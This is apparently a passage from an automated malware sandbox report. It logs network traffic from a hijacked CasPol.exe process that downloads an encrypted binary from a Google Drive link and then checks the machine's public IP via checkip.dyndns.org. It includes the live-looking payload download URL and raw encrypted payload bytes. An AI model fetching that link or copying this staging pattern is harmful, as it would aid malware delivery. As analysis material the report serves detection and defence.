Mar 17, 2023 14:34:27.819230080 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.819427967 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.819968939 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.820146084 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.820152998 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.820266962 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.820270061 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.820461988 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.820888996 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821038961 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821114063 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.821129084 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821219921 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.821283102 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.821824074 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821897984 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821938992 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821960926 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.821966887 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.821974039 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.822173119 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.822740078 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.822864056 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.822891951 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.822902918 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.822916985 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.823019028 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.823019028 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.823153019 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.823158979 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.823297024 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.823574066 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.823700905 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.823730946 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.823751926 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.823759079 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.823919058 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.823925972 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.824062109 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.824491978 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.824673891 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.824685097 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.824820995 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.824847937 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.824862957 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.824914932 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.824925900 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825031996 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825031996 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825129032 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825323105 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825375080 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825459003 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825467110 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825566053 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825576067 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825629950 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825647116 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825650930 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.825719118 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.825798988 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.826210976 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.826361895 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.826370955 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.826481104 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.826508045 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.826535940 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.826559067 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.826690912 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.826781034 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.827220917 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.827353954 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.827411890 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.827419043 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.827480078 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.827518940 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.827590942 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.827595949 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.827706099 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.827852011 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.828107119 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.828248024 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.828254938 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.828392982 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.828399897 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.828461885 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.828589916 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.828634977 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.828641891 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.828778982 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.829056978 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.829201937 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.829268932 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.829320908 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.829375029 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.829408884 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.829463005 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.829544067 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.829600096 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.829741001 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.830039978 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830099106 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830173969 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.830174923 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830180883 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830264091 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.830267906 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830444098 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.830446959 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830579042 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.830790997 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830889940 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:27.830940962 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.831110001 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:27.831110001 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:28.139965057 CET	49841	443	192.168.11.20	142.250.186.33
Mar 17, 2023 14:34:28.139990091 CET	443	49841	142.250.186.33	192.168.11.20
Mar 17, 2023 14:34:28.579044104 CET	49842	80	192.168.11.20	193.122.130.0
Mar 17, 2023 14:34:28.679069042 CET	80	49842	193.122.130.0	192.168.11.20
Mar 17, 2023 14:34:28.679271936 CET	49842	80	192.168.11.20	193.122.130.0
Mar 17, 2023 14:34:28.679795027 CET	49842	80	192.168.11.20	193.122.130.0
Mar 17, 2023 14:34:28.779683113 CET	80	49842	193.122.130.0	192.168.11.20
Mar 17, 2023 14:34:28.781480074 CET	80	49842	193.122.130.0	192.168.11.20
Mar 17, 2023 14:34:28.827358007 CET	49842	80	192.168.11.20	193.122.130.0
Mar 17, 2023 14:35:02.051467896 CET	49842	80	192.168.11.20	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 14:34:25.800806999 CET	53317	53	192.168.11.20	1.1.1.1
Mar 17, 2023 14:34:25.810267925 CET	53	53317	1.1.1.1	192.168.11.20
Mar 17, 2023 14:34:26.492222071 CET	64485	53	192.168.11.20	1.1.1.1
Mar 17, 2023 14:34:26.525289059 CET	53	64485	1.1.1.1	192.168.11.20
Mar 17, 2023 14:34:28.565037012 CET	53811	53	192.168.11.20	1.1.1.1
Mar 17, 2023 14:34:28.573910952 CET	53	53811	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2023 14:34:25.800806999 CET	192.168.11.20	1.1.1.1	0x9c31	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:26.492222071 CET	192.168.11.20	1.1.1.1	0xb9a5	Standard query (0)	doc-0k-a8-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:28.565037012 CET	192.168.11.20	1.1.1.1	0x9827	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2023 14:34:25.810267925 CET	1.1.1.1	192.168.11.20	0x9c31	No error (0)	drive.google.com		142.250.184.206	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:26.525289059 CET	1.1.1.1	192.168.11.20	0xb9a5	No error (0)	doc-0k-a8-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2023 14:34:26.525289059 CET	1.1.1.1	192.168.11.20	0xb9a5	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.33	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:28.573910952 CET	1.1.1.1	192.168.11.20	0x9827	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2023 14:34:28.573910952 CET	1.1.1.1	192.168.11.20	0x9827	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:28.573910952 CET	1.1.1.1	192.168.11.20	0x9827	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:28.573910952 CET	1.1.1.1	192.168.11.20	0x9827	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:28.573910952 CET	1.1.1.1	192.168.11.20	0x9827	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 17, 2023 14:34:28.573910952 CET	1.1.1.1	192.168.11.20	0x9827	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-0k-a8-docs.googleusercontent.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49840	142.250.184.206	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49841	142.250.186.33	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49842	193.122.130.0	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
Mar 17, 2023 14:34:28.679795027 CET	370	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 17, 2023 14:34:28.781480074 CET	370	IN	HTTP/1.1 200 OK Date: Fri, 17 Mar 2023 13:34:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.35</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49840	142.250.184.206	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 13:34:25 UTC	0	OUT	GET /uc?export=download&id=1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2023-03-17 13:34:26 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 17 Mar 2023 13:34:26 GMT Location: https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337//1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-WMUwB9LCnaOOmtFxwD_pPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49841	142.250.186.33	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 13:34:27 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0k-a8-docs.googleusercontent.com Connection: Keep-Alive
2023-03-17 13:34:27 UTC	1	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdsXS4acQvg1knzen0LJ8wHp6PWGPe6pthuqpkqcKjFceoseRdIltwCVu6RhNS5rdqSh1RsYT1k9_RbeJ0lGhAijhniPPcDT Content-Type: application/octet-stream Content-Disposition: attachment; filename="QKUNUNhd48.bin"; filename=UTF-8''QKUNUNhd48.bin Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 130624 Date: Fri, 17 Mar 2023 13:34:27 GMT Expires: Fri, 17 Mar 2023 13:34:27 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=0Y7VEA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-03-17 13:34:27 UTC	5	IN	Data Raw: 63 17 2d 71 2f 08 59 76 67 2e 2c 3f 72 3f a5 23 f0 a9 22 33 a7 09 2d 8b 09 58 6c 71 2a cd 17 93 1f d7 27 fa 2c f7 11 7e 84 bb cc ec 98 36 06 9e 44 40 6a ec 40 64 8c 2b f6 61 d5 95 f3 68 1e 08 f3 bc 07 11 9e 2a 19 77 62 69 82 16 ef cc 39 69 6c 9b d9 64 5a 53 8e af 0e 3f 6a ea 28 41 29 86 ee 89 fd d5 9a 16 8c 69 24 a7 e8 c8 8b c8 cc ad 53 8d 63 5c 6f b2 21 9c e2 10 5e ac 4e cd bc 74 be 63 b7 84 61 ac 4d b8 32 5d 81 4e 18 5f 46 ea 76 30 4b 34 14 14 5c 26 01 99 ef f5 1a e1 dc fd c8 be 37 b2 f9 00 11 0e 5e dd ff 0f 0e 3b 2f 6f c0 7c 1a e2 b2 b1 3b b3 8f 3d 21 ab af a0 54 74 db ea 81 ef 93 d8 38 ec 75 6e 95 f5 bb 9c 93 e5 2b 43 60 fe 6c 14 28 3e 6b 9d c7 56 39 38 c7 a7 1c 3f c2 8a e9 1c 5a 6b 4d 52 09 6a 83 73 e7 75 a8 9c 48 fb 98 5d 0a 4d ea 60 ce b8 c9 fb f1 Data Ascii: c-q/Yvg.,?r?#"3-Xlq',~6D@j@d+ahwbi9ildZS?j(A)i$Sc\o!^NtcaM2]N_Fv0K4\&7^;/o\|;=!Tt8un+C`l(>kV98?ZkMRjsuH]M`
2023-03-17 13:34:27 UTC	9	IN	Data Raw: 9b d3 4c 05 53 8e a5 5d 3a 7b ef 5a fb 2d 86 9e 9f d5 b5 9a 16 86 45 26 8c fb c8 90 c4 b2 a3 53 8d 67 4d 6b 28 4e fd e2 10 54 ac e5 ce bc 5f b0 7c 13 86 70 1c 53 a3 00 e1 91 06 dc 4f a6 5c 66 44 7c 1c 70 70 7e 5e 60 f4 cf 96 7b 8f b2 f4 43 61 aa b8 26 8d 9b e1 81 4b 6e 91 b5 8b 83 e6 52 ec 81 3e 63 43 c9 05 54 c2 de 14 50 5f ab b8 74 50 7e 31 e5 d1 30 ea ad 4d c8 95 ac b7 92 e3 6e 41 60 fe 8c 14 2a 3f 60 28 68 a9 c6 0e e6 d2 58 2b c2 8b fd e2 59 6d 15 ab 08 35 84 45 19 74 f7 42 5b 8f dc 5d 4a 4c c2 74 ce b8 c3 27 37 85 57 3f 1a b0 0e 32 c8 48 a2 8d c1 98 86 f8 75 57 12 cd 08 28 55 73 93 a1 f2 f1 27 fd b8 80 e5 34 4c 90 c8 d2 79 66 1c bb 46 3f fc e5 10 aa d4 08 b4 11 2c 3a a2 b2 75 14 3d 81 db e1 22 b6 2c 9a 91 1d 59 01 e8 21 aa 9c 40 44 ab 5f e5 3e 60 e2 Data Ascii: LS]:{Z-E&SgMk(NT_\|pSO\fD\|pp~^`{Ca&KnR>cCTP_tP~10MnA`*?`(hX+Ym5EtB[]JLt'7W?2HuW(Us'4LyfF?,:u=",Y!@D_>`
2023-03-17 13:34:27 UTC	13	IN	Data Raw: 52 c6 de 5e 6e 68 77 db 0c 2f 4a 7e aa 43 ad 13 7e 96 9a ab e0 aa ad 2c 27 ba aa 2e 3d 8a 8f bc 89 fe d7 f4 f5 e4 de 90 f8 96 bb 9c 93 e5 1b 02 3b dd 8c 14 2a 3f 60 9c 07 16 62 f8 58 a7 1c 21 7b 86 e1 34 c5 6b 03 5f 79 cb 90 53 97 5d ee bc 4a f1 8b 59 5b 49 e0 6b ce be e3 f9 e2 95 67 3f 36 30 26 50 e9 48 a8 e6 c6 9c 20 d0 25 5d 3a 66 08 02 5f 01 3a b3 e2 81 0f 5e b8 81 ef ab 21 90 c4 60 51 09 1c a0 7c 37 fb 02 3b aa d2 37 b4 11 2e 0a a3 9a 32 14 3d 8b fa fe dc ad 34 be eb 13 59 07 83 0c c3 8b 90 26 19 4c e1 1f 2c e5 3c 37 f9 f2 2c 55 06 c5 dc 14 b6 11 04 48 aa 17 17 9e e4 10 97 e1 82 30 7d 87 b7 7e b5 bb e1 88 01 e4 b2 15 9d 16 33 ad af 05 0a 96 b6 9b 85 0a 7c 93 dc f6 60 56 b5 a9 d6 29 34 bb aa 64 07 f3 d4 4c 14 20 91 35 db fc 96 00 d0 4c d0 83 f7 b0 b4 Data Ascii: R^nhw/J~C~,'.=;*?`bX!{4k_yS]JY[Ikg?60&PH %]:f_:^!`Q\|7;7.2=4Y&L,<7,UH0}~3\|`V)4dL 5L
2023-03-17 13:34:27 UTC	17	IN	Data Raw: fb 92 5d 5b 4a 85 80 ce b8 c3 87 d9 a5 64 3b 7f f1 26 50 c2 48 b9 f0 b4 3a 96 d0 55 7f a2 c7 08 08 27 d7 85 a0 92 d9 48 fc b8 8b 8a 41 80 90 ce 6a 51 3b 1c a0 70 2f f4 19 18 d9 10 1d b4 1b 2e 33 b3 9d 4a d1 3d 8b d1 ef d5 ce ae 8f ef 63 27 0c ec af c7 a3 dc 49 bd 46 93 f1 31 e2 46 6f 3f f4 06 5f 7a 32 dd 14 ab 11 15 4f f9 fb 0f 8f 94 10 23 e1 82 3c 60 be a0 7e cf fc 2b 88 01 e4 d6 d1 97 3d 39 ab fb 22 19 a6 b0 e8 7b 0a 7c 99 ed fc 1e 64 b5 8a d2 5b 04 b9 aa 14 c1 9a b8 64 10 2a 87 cd b5 4c 9d Data Ascii: ][Jd;&PH:U'HAjQ;p/.3J=c'IF1Fo?_z2O#<`~+=9"{\|d[d*L
